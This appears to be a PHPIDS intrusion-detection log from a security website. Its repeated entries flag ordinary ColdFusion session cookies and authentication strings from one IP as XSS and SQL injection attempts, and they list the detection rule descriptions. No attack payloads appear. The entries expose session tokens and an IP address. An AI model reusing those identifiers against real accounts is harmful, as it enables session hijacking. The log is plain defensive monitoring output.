| ID: | 122913 | | Name: | REQUEST.UserAuthentication | | Value: | authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:44 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122914 | | Name: | COOKIE.CFCLIENT_MOTNES | | Value: | userrecid=0#loggedin=false# | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:44 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 122915 | | Name: | COOKIE.CFGLOBALS | | Value: | urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606# | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:44 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.125 Converted: ((((+::
|
| ID: | 122916 | | Name: | COOKIE.UserAuthentication | | Value: | authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:44 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122905 | | Name: | REQUEST.CFCLIENT_MOTNES | | Value: | userrecid=0#loggedin=false# | | Page: | /i.php?page=security/xss-sql-and-command-inject-vectors | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:40 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 122906 | | Name: | REQUEST.CFGLOBALS | | Value: | urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606# | | Page: | /i.php?page=security/xss-sql-and-command-inject-vectors | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:40 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.125 Converted: ((((+::
|
| ID: | 122907 | | Name: | REQUEST.UserAuthentication | | Value: | authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US | | Page: | /i.php?page=security/xss-sql-and-command-inject-vectors | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:40 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122908 | | Name: | COOKIE.CFCLIENT_MOTNES | | Value: | userrecid=0#loggedin=false# | | Page: | /i.php?page=security/xss-sql-and-command-inject-vectors | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:40 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 122909 | | Name: | COOKIE.CFGLOBALS | | Value: | urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606# | | Page: | /i.php?page=security/xss-sql-and-command-inject-vectors | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:40 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.125 Converted: ((((+::
|
| ID: | 122910 | | Name: | COOKIE.UserAuthentication | | Value: | authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US | | Page: | /i.php?page=security/xss-sql-and-command-inject-vectors | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:40 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122899 | | Name: | REQUEST.CFCLIENT_MOTNES | | Value: | userrecid=0#loggedin=false# | | Page: | /i.php?page=security/igigle-wigle-wifi-to-google-earth-client-for-wardrive-mapping | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:36 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 122900 | | Name: | REQUEST.CFGLOBALS | | Value: | urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606# | | Page: | /i.php?page=security/igigle-wigle-wifi-to-google-earth-client-for-wardrive-mapping | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:36 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.125 Converted: ((((+::
|
| ID: | 122901 | | Name: | REQUEST.UserAuthentication | | Value: | authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US | | Page: | /i.php?page=security/igigle-wigle-wifi-to-google-earth-client-for-wardrive-mapping | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:36 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122902 | | Name: | COOKIE.CFCLIENT_MOTNES | | Value: | userrecid=0#loggedin=false# | | Page: | /i.php?page=security/igigle-wigle-wifi-to-google-earth-client-for-wardrive-mapping | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:36 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 122903 | | Name: | COOKIE.CFGLOBALS | | Value: | urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606# | | Page: | /i.php?page=security/igigle-wigle-wifi-to-google-earth-client-for-wardrive-mapping | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:36 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.125 Converted: ((((+::
|
| ID: | 122904 | | Name: | COOKIE.UserAuthentication | | Value: | authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US | | Page: | /i.php?page=security/igigle-wigle-wifi-to-google-earth-client-for-wardrive-mapping | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:36 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122893 | | Name: | REQUEST.CFCLIENT_MOTNES | | Value: | userrecid=0#loggedin=false# | | Page: | /i.php?page=videos/shmoocon-test-video-avisynth-split-screen | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:32 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 122894 | | Name: | REQUEST.CFGLOBALS | | Value: | urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606# | | Page: | /i.php?page=videos/shmoocon-test-video-avisynth-split-screen | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:32 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.125 Converted: ((((+::
|
| ID: | 122895 | | Name: | REQUEST.UserAuthentication | | Value: | authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US | | Page: | /i.php?page=videos/shmoocon-test-video-avisynth-split-screen | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:32 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122896 | | Name: | COOKIE.CFCLIENT_MOTNES | | Value: | userrecid=0#loggedin=false# | | Page: | /i.php?page=videos/shmoocon-test-video-avisynth-split-screen | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:32 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 122897 | | Name: | COOKIE.CFGLOBALS | | Value: | urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606# | | Page: | /i.php?page=videos/shmoocon-test-video-avisynth-split-screen | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:32 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.125 Converted: ((((+::
|
| ID: | 122898 | | Name: | COOKIE.UserAuthentication | | Value: | authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US | | Page: | /i.php?page=videos/shmoocon-test-video-avisynth-split-screen | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:32 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122887 | | Name: | REQUEST.CFCLIENT_MOTNES | | Value: | userrecid=0#loggedin=false# | | Page: | /i.php?page=videos/anti-forensics-occult-computing | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:27 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 122888 | | Name: | REQUEST.CFGLOBALS | | Value: | urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606# | | Page: | /i.php?page=videos/anti-forensics-occult-computing | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:27 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.125 Converted: ((((+::
|
| ID: | 122889 | | Name: | REQUEST.UserAuthentication | | Value: | authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US | | Page: | /i.php?page=videos/anti-forensics-occult-computing | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:27 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122890 | | Name: | COOKIE.CFCLIENT_MOTNES | | Value: | userrecid=0#loggedin=false# | | Page: | /i.php?page=videos/anti-forensics-occult-computing | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:27 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 122891 | | Name: | COOKIE.CFGLOBALS | | Value: | urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606# | | Page: | /i.php?page=videos/anti-forensics-occult-computing | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:27 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.125 Converted: ((((+::
|
| ID: | 122892 | | Name: | COOKIE.UserAuthentication | | Value: | authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US | | Page: | /i.php?page=videos/anti-forensics-occult-computing | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:27 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122881 | | Name: | REQUEST.CFCLIENT_MOTNES | | Value: | userrecid=0#loggedin=false# | | Page: | /i.php?page=videos/attacking-and-securing-wpa-enterprise-matt-neely | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:23 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 122882 | | Name: | REQUEST.CFGLOBALS | | Value: | urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606# | | Page: | /i.php?page=videos/attacking-and-securing-wpa-enterprise-matt-neely | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:23 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.125 Converted: ((((+::
|
| ID: | 122883 | | Name: | REQUEST.UserAuthentication | | Value: | authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US | | Page: | /i.php?page=videos/attacking-and-securing-wpa-enterprise-matt-neely | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:23 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122884 | | Name: | COOKIE.CFCLIENT_MOTNES | | Value: | userrecid=0#loggedin=false# | | Page: | /i.php?page=videos/attacking-and-securing-wpa-enterprise-matt-neely | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:23 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 122885 | | Name: | COOKIE.CFGLOBALS | | Value: | urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606# | | Page: | /i.php?page=videos/attacking-and-securing-wpa-enterprise-matt-neely | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:23 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.125 Converted: ((((+::
|
| ID: | 122886 | | Name: | COOKIE.UserAuthentication | | Value: | authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US | | Page: | /i.php?page=videos/attacking-and-securing-wpa-enterprise-matt-neely | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:23 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122875 | | Name: | REQUEST.CFCLIENT_MOTNES | | Value: | userrecid=0#loggedin=false# | | Page: | /i.php?page=videos/scott-moulton-reassembling-raid-by-sight-and-sound | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:18 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 122876 | | Name: | REQUEST.CFGLOBALS | | Value: | urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606# | | Page: | /i.php?page=videos/scott-moulton-reassembling-raid-by-sight-and-sound | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:18 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.125 Converted: ((((+::
|
| ID: | 122877 | | Name: | REQUEST.UserAuthentication | | Value: | authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US | | Page: | /i.php?page=videos/scott-moulton-reassembling-raid-by-sight-and-sound | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:18 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122878 | | Name: | COOKIE.CFCLIENT_MOTNES | | Value: | userrecid=0#loggedin=false# | | Page: | /i.php?page=videos/scott-moulton-reassembling-raid-by-sight-and-sound | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:18 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 122879 | | Name: | COOKIE.CFGLOBALS | | Value: | urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606# | | Page: | /i.php?page=videos/scott-moulton-reassembling-raid-by-sight-and-sound | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:18 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.125 Converted: ((((+::
|
| ID: | 122880 | | Name: | COOKIE.UserAuthentication | | Value: | authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US | | Page: | /i.php?page=videos/scott-moulton-reassembling-raid-by-sight-and-sound | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:18 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122869 | | Name: | REQUEST.CFCLIENT_MOTNES | | Value: | userrecid=0#loggedin=false# | | Page: | /i.php?page=security/programmable-hid-usb-keystroke-dongle | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:13 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 122870 | | Name: | REQUEST.CFGLOBALS | | Value: | urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606# | | Page: | /i.php?page=security/programmable-hid-usb-keystroke-dongle | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:13 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.125 Converted: ((((+::
|
| ID: | 122871 | | Name: | REQUEST.UserAuthentication | | Value: | authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US | | Page: | /i.php?page=security/programmable-hid-usb-keystroke-dongle | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:13 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122872 | | Name: | COOKIE.CFCLIENT_MOTNES | | Value: | userrecid=0#loggedin=false# | | Page: | /i.php?page=security/programmable-hid-usb-keystroke-dongle | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:13 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 122873 | | Name: | COOKIE.CFGLOBALS | | Value: | urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606# | | Page: | /i.php?page=security/programmable-hid-usb-keystroke-dongle | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:13 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.125 Converted: ((((+::
|
| ID: | 122874 | | Name: | COOKIE.UserAuthentication | | Value: | authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US | | Page: | /i.php?page=security/programmable-hid-usb-keystroke-dongle | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:13 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
